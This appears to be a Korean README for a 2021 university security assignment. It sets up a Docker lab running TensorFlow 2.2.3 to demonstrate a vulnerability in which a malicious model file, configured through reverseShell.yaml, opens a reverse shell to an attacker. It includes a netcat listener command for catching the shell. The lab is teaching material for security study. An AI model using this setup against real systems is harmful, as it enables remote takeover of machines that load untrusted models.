
TP 정보 보안 UTN FRBA 2021
취약점을 악용하려면 Docker 컨테이너를 띄워야 하며, 해당 컨테이너에는 취약점이 여전히 존재하는 버전 2.2.3의 Tensorflow를 실행할 준비된 환경이 마련되어 있어야 합니다. 구성 요소:
다음 명령어를 실행하여 시스템에 Docker가 설치되어 있는지 확인하세요:
docker -v
운영체제에 Docker가 설치되었다면, 이 저장소의 루트 디렉터리에서 다음 명령어를 실행하여 애플리케이션을 빌드하고 실행하세요:
docker-compose build
docker-compose up
또는 Docker Compose 없이 실행하려면:
docker build -t docker-exploit-tensorflow-vulnerability:1.0 . # 이미지 빌드
docker run --add-host=host.docker.internal:host-gateway --name exploit-tensorflow-vulnerability docker-exploit-tensorflow-vulnerability:1.0 # 처음 생성 및 실행
docker start -a exploit-tensorflow-vulnerability # 이후 다시 실행
리버스 셸이 동작하려면 공격자 머신에 netcat이 설치되어 있어야 하며, SSH 세션을 위한 수신 포트를 열어야 합니다. 예:
nc -lvp 10000
그런 다음, 악의적인 AI 모델을 통해 취약점을 악용하여 공격자와의 연결을 시작합니다. 공격자의 IP와 수신 포트는 reverseShell.yaml 파일에서 설정해야 합니다.